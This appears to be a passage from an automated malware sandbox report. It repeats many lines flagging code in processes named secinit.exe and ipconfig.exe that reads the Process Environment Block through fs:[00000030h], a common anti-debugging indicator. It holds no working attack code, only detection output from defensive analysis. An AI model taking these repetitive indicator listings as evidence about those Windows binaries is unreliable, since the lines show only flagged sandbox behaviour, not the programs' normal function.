Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03853D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03853D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03853D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03853D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_0384AD30 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_038CA537 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03874D3B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03874D3B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03874D3B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_0387513A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_0387513A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_0386B944 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_0386B944 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03883D43 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_038C3540 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03867D50 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_0384C962 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_0386C577 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_0386C577 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_0384B171 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_0384B171 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03849080 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_038C3884 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_038C3884 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_0385849B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_038890AF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_038720A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_038720A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_038720A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_038720A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_038720A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_038720A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_0387F0BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_0387F0BF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_0387F0BF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03918CD6 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_038DB8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_038DB8D0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_038DB8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_038DB8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_038DB8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_038DB8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_038458EC mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_039014FB mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_038C6CF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_038C6CF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_038C6CF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03914015 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03914015 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_038C6C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_038C6C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_038C6C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_038C6C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03901C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03901C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03901C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03901C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03901C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03901C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03901C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03901C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03901C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03901C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03901C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03901C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03901C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03901C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_038C7016 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_038C7016 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_038C7016 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_0391740D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_0391740D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_0391740D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_0387002D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_0387002D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_0387002D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_0387002D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_0387002D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_0387BC2C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_0385B02A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_0385B02A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_0385B02A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_0385B02A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_0387A44B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03860050 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03860050 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_038DC450 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_038DC450 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03902073 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03911074 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_0386746D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BBF0BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BBF0BF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BBF0BF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C1B8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C1B8D0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C1B8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C1B8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C1B8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C1B8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BC90AF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BB20A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BB20A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BB20A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BB20A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BB20A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BB20A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00B89080 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C03884 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C03884 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00B858EC mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00B9B02A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00B9B02A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00B9B02A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00B9B02A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BB002D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BB002D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BB002D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BB002D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BB002D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C51074 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C42073 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C54015 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C54015 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C07016 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C07016 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C07016 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BA0050 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BA0050 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BB61A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BB61A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C141E8 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BB2990 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BAC182 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BBA185 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00B8B1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00B8B1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00B8B1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C069A6 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C051BE mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C051BE mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C051BE mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C051BE mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BB513A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BB513A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BA4120 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BA4120 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BA4120 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BA4120 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BA4120 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00B89100 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00B89100 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00B89100 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00B8B171 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00B8B171 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00B8C962 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BAB944 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BAB944 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00B9AAB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00B9AAB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BBFAB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00B852A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00B852A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00B852A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00B852A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00B852A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BBD294 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BBD294 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BB2AE4 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BB2ACB mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BC4A2C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BC4A2C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C4EA55 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C14257 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C3B260 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C3B260 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BA3A1C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C58A62 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00B85210 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00B85210 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00B85210 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00B85210 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00B8AA16 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00B8AA16 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00B98A0A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BC927A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C4AA16 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C4AA16 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00B89240 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00B89240 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00B89240 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00B89240 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C053CA mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C053CA mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BB4BAD mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BB4BAD mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BB4BAD mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BBB390 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BB2397 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00B91B8F mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00B91B8F mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C3D380 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C4138A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BADBE9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BB03E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BB03E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BB03E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BB03E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BB03E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BB03E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C55BA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C58B58 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BB3B7A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BB3B7A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00B8DB60 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C4131B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00B8F358 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00B8DB40 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C58CD6 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00B9849B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C06CF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C06CF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C06CF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C414FB mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C1C450 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C1C450 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BBBC2C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C41C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C41C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C41C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C41C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C41C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C41C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C41C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C41C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C41C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C41C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C41C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C41C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C41C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C41C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C5740D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C5740D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C5740D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C06C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C06C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C06C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C06C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BA746D mov eax, dword ptr fs:[00000030h]
